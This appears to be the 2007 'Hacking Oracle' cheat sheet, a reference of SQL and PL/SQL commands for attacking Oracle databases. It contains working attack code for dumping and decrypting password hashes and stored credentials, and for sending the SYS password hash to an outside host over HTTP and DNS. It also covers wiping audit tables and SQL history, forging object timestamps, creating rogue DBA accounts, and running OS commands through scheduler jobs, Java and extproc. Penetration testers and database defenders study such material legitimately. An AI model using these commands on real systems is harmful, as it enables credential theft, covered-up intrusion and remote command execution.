Information Retrieval:
Get Version:
select * from v$version
-- all users
Get Security Patchlevel:
select * from dba_registry;
-- only DBA, 9i+; an empty or non-existent table means no security patch is installed
Installed Database Components:
select * from dba_registry;
-- only DBA
Get Userlist:
select * from all_users;
-- only DBA
Get User & Passwords Hashes:
select username,password,account_status from dba_users;
-- only DBA until 10g R2
Get Apex Password Hashes:
select user_name, web_password_raw from flows_030000.wwv_flow_fnd_user;
-- only DBA; the schema suffix encodes the APEX version: 030000 = 3.0, 020100 = 2.1
Decrypt Apex Password Hashes:
select user_name,
utl_http.request('http://md5.rednoize.com/?q='||web_password_raw||’&b=MD5-Search’)
-- only DBA; requires outbound internet access from the database and sends the hash to an external third-party site
from flows_030000.wwv_flow_fnd_user;
Get Metalink account/password:
select sysman.decrypt(aru_username), sysman.decrypt(aru_password)
-- only DBA, 10g – 11g
Get Password of mgmt_view_user
select view_username, sysman.decrypt(view_password)
from sysman.mgmt_view_user_credentials;
-- only DBA, 10g – 11g
Get Passwords of DB/Grid Control:
select credential_set_column, sysman.decrypt(credential_value)
from sysman.mgmt_credentials2;
-- only DBA, 10g – 11g
TDE Encrypted Tables:
select table_name,column_name,encryption_alg,salt
from dba_encrypted_columns;
-- only DBA, 10g – 11g
Already DBA?
desc dba_users
-- only possible as DBA (or with the SELECT ANY DICTIONARY privilege)
Get System Privileges:
select * from user_sys_privs;
-- show system privileges of the current user
Get Role Privileges:
select * from user_role_privs;
-- show role privileges of the current user
Get Table Privileges:
select * from user_tab_privs;
-- show table privileges of the current user
Get interesting tables:
select table_name, column_name, owner
from dba_tab_columns
where ((upper(column_name) -- show tables with columns whose name contains the string 'PWD', ...
like '%PWD%' or upper(column_name) like '%PASSW%' or
upper(column_name) like '%CREDEN%' or
upper(column_name) like '%AUTH%'))
Get a list of all Oracle directories:
select * from dba_directories;
-- show Oracle directories
Show Values of audit parameter:
show parameter audit
-- show all parameters whose name contains 'audit'
Show Values of utl parameter:
show parameter utl
-- show all parameters whose name contains 'utl'
Access SQL History (v$sql):
select sql_text
from sys.v$sql
where lower(sql_text) like '%utl_http%';
-- search all SQL statements containing the string utl_http
Access SQL History (wrh$_sqltext):
select sql_text
from sys.wrh$_sqltext
where lower(sql_text) like '%utl_http%';
-- search all SQL statements containing the string utl_http
Web Access:
Web access via utl_http:
select utl_http.request('http://www.orasploit.com/utl_http') from dual;
-- all users, 8-10g R2
Web access via httpuritype:
select httpuritype( 'http://www.orasploit.com/httpuritype' ).getclob() from dual;
-- all users, 8-10g R2
Send password hash to webserver:
select utl_http.request('http://www.orasploit.com/' ||
(select username || '=' || password
from dba_users
-- only DBA; change the username value to select a different user
where username = 'SYS'))
from dual;
Send password hash to webserver:
select httpuritype('http://www.orasploit.com/' ||
(select username || '=' || password
from dba_users
-- only DBA; change the username value to select a different user
where username = 'SYS')) .getclob()
from dual;
Send password hash via DNS:
select utl_http.request('http://www.' ||
(select username || '=' || password
from dba_users
-- only DBA; change the username value to select a different user
where username = 'SYS') || '.orasploit.com/')
from dual;
Change Oracle Passwords:
With SQL*Plus Password cmd:
password system;
-- password is not sent in cleartext over the network
With Alter user cmd:
alter user system identified by rds2007;
-- password is sent in cleartext over the network
With Alter user cmd:
alter user system identified by values '737B466C2DF536B9’;
-- Set a password hash directly
With grant:
grant connect to system identified by rds2007;
-- password is sent in cleartext over the network
With update:
update sys.user$ set password = '737B466C2DF536B9' where name=’SYSTEM’;
-- password is sent in cleartext over the network; a DB restart is necessary
Useful Tools / Links:
checkpwd: http://www.red-database-security.com/software/checkpwd.html -- fastest Oracle dictionary password cracker
orabf http://www.toolcrypt.org/tools/orabf/index.html -- fastest Oracle Brute Force cracker
Tnscmd http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd -- control unprotected TNS Listener without Oracle Client
sidguess: http://www.red-database-security.com/software/sidguess.zip -- fastest Oracle dictionary password cracker
Oracle Assessment Kit: http://www.databasesecurity.com/dbsec/OAK.zip -- useful tools, e.g. to exploit the alter session bug
Oracle Instant Client http://www.oracle.com/technology/software/tech/oci/instantclient/index.html -- Oracle Instant Client
Oracle SQL Developer http://www.oracle.com/technology/software/products/sql/index.html -- GUI Tool for Oracle in Java
Anti-Forensics:
Clear v$sql:
alter system flush shared pool;
-- only DBA, all versions
Clear sys.wrh_sqlstat:
truncate table sys.wrh$_sqlstat;
-- only DBA, 10g/11g
Clear audit-Table:
truncate table sys.aud$;
-- only as SYS, all versions
Clear audit-Table:
delete table sys.aud$;
-- all users, all versions
Change Object Creation Date:
update sys.obj$
set ctime = sysdate - 300, mtime = sysdate - 300, stime = sysdate - 300
where name = 'AUD$';
-- change the creation date of an object
Create Oracle User:
With create user cmd:
create user user1 identified by rds2007;
grant dba to user1;
-- password is sent in cleartext over the network
With grant:
grant dba to user1 identified by rds2007;
-- privilege granted; the user is created if it does not already exist
With grant:
grant connect to user1,user2,user3,user4 identified by user1,user2,user3,user4;
-- password is sent in cleartext over the network
Run OS Commands via dbms_scheduler: (10g/11g only)
-- Create a Program for dbms_scheduler
exec DBMS_SCHEDULER.create_program('RDS2007','EXECUTABLE','c:\WINDOWS\system32\cmd.exe /c echo 0wned >> c:\rds3.txt',0,TRUE);
-- Create, execute and delete a Job for dbms_scheduler
exec DBMS_SCHEDULER.create_job(job_name => 'RDS2007JOB',program_name => 'RDS2007',start_date => NULL,repeat_interval => NULL,end_date => NULL,enabled => TRUE,auto_drop => TRUE);
-- delete the program
exec DBMS_SCHEDULER.drop_program(PROGRAM_NAME => 'RDS2007');
-- Purge the logfile for dbms_scheduler
--exec DBMS_SCHEDULER.PURGE_LOG;
Hacking Oracle – www.red-database-security.com - Version 1.3 - 2-Sep-2007
Write Binary Files via utl_file:
Create or replace directory EXT as 'C:\’;
DECLARE fi UTL_FILE.FILE_TYPE; bu RAW(32767);
BEGIN
bu:=hextoraw('BF3B01BB8100021E8000B88200882780FB81750288D850E8060083
C402CD20C35589E5B80100508D451A50B80F00508D5D00FFD383C40689EC5DC
3558BEC8B5E088B4E048B5606B80040CD21730231C08BE55DC39048656C6C6F
2C20576F726C64210D0A');
fi:=UTL_FILE.fopen('EXT','rds2007.com','w',32767);
UTL_FILE.put_raw(fi,bu,TRUE);
UTL_FILE.fclose(fi);
END;
/
Write Text Files via dbms_advisor: (10g/11g, requires the ADVISOR privilege)
Create or replace directory EXT as 'C:\’;
grant advisor to user1;
exec dbms_advisor.create_file ( 'hacked', EXT, 'rds2.txt' )
Write Text Files via utl_file:
Create or replace directory EXT as 'C:\’;
DECLARE
v_file UTL_FILE.FILE_TYPE;
BEGIN
v_file := UTL_FILE.FOPEN('C:\','rds1.txt', 'w');
UTL_FILE.PUT_LINE(v_file,'first row');
UTL_FILE.NEW_LINE (v_file);
UTL_FILE.PUT_LINE(v_file,'second row');
UTL_FILE.FCLOSE(v_file);
END;
Read Files via Java:
grant javasyspriv to user1;
CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVAREADFILE" AS
import java.lang.*;
import java.io.*;
public class JAVAREADFILE{
public static void readfile(String filename) throws IOException{
FileReader f = new FileReader(filename);
BufferedReader fr = new BufferedReader(f);
String text = fr.readLine();;
while(text != null){
System.out.println(text);
text = fr.readLine(); }
fr.close(); }
};
CREATE OR REPLACE PROCEDURE JAVAREADFILEPROC (p_filename IN
VARCHAR2)
AS LANGUAGE JAVA
NAME 'JAVAREADFILE.readfile (java.lang.String)';
/
set serveroutput on size 100000
exec dbms_java.set_output(2000);
exec JAVAREADFILEPROC('C:\boot.ini')
Run OS Commands via Java: (requires Java in the Database)
grant javasyspriv to user1;
create or replace and resolce java source name "JAVACMD" AS
import java.lang.*;
import java.io.*;
public class JAVACMD
{
public static void execCommand (String command) throws IOException {
Runtime.getRuntime().exec(command);} };
/
Create or replace procedure javacmdproc (p_command in varchar2)
as language java
name 'JAVACMD.execCommand (java.lang.String)';
/
exec javacmdproc('cmd.exe /c echo 0wned > c:\rds4.txt');
Run OS Commands via ALTER SYSTEM & PL/SQL native: (9i)
alter system set plsql_native_make_utility='cmd.exe /c echo 0wned > c:\rds6.txt &';
alter session set plsql_compiler_flags='NATIVE';
Create or replace procedure rds as begin null; end;
/
Run OS Commands via Extproc
-- Since 9i extproc can only run DLLs from the Oracle_Home-Bin directory
-- copy the msvcrt.dll to this directory before executing this code
Grant create any library to user1;
--Windows
Create or replace library exec_shell AS 'C:\oracle\ora102\bin\msvcrt.dll';
--Linux
create or replace library systemcalls is '/lib/libc.so';
Create or replace package oracmd is procedure exec(cmdstring IN CHAR); end oracmd; /
Create or replace package body oracmd IS
procedure exec(cmdstring IN CHAR)
is external NAME "system"
library exec_shell LANGUAGE C;
end oracmd;
/
exec oracmd.exec('cmd.exe /c echo 0wned > c:\rds7.txt');
Run OS Commands via ALTER SYSTEM & PL/SQL native: (9i)
alter system set plsql_native_make_utility='cmd.exe /c echo 0wned > c:\rds5.txt &';
alter session set plsql_compiler_flags='NATIVE';
Create or replace procedure rds as begin null; end;
/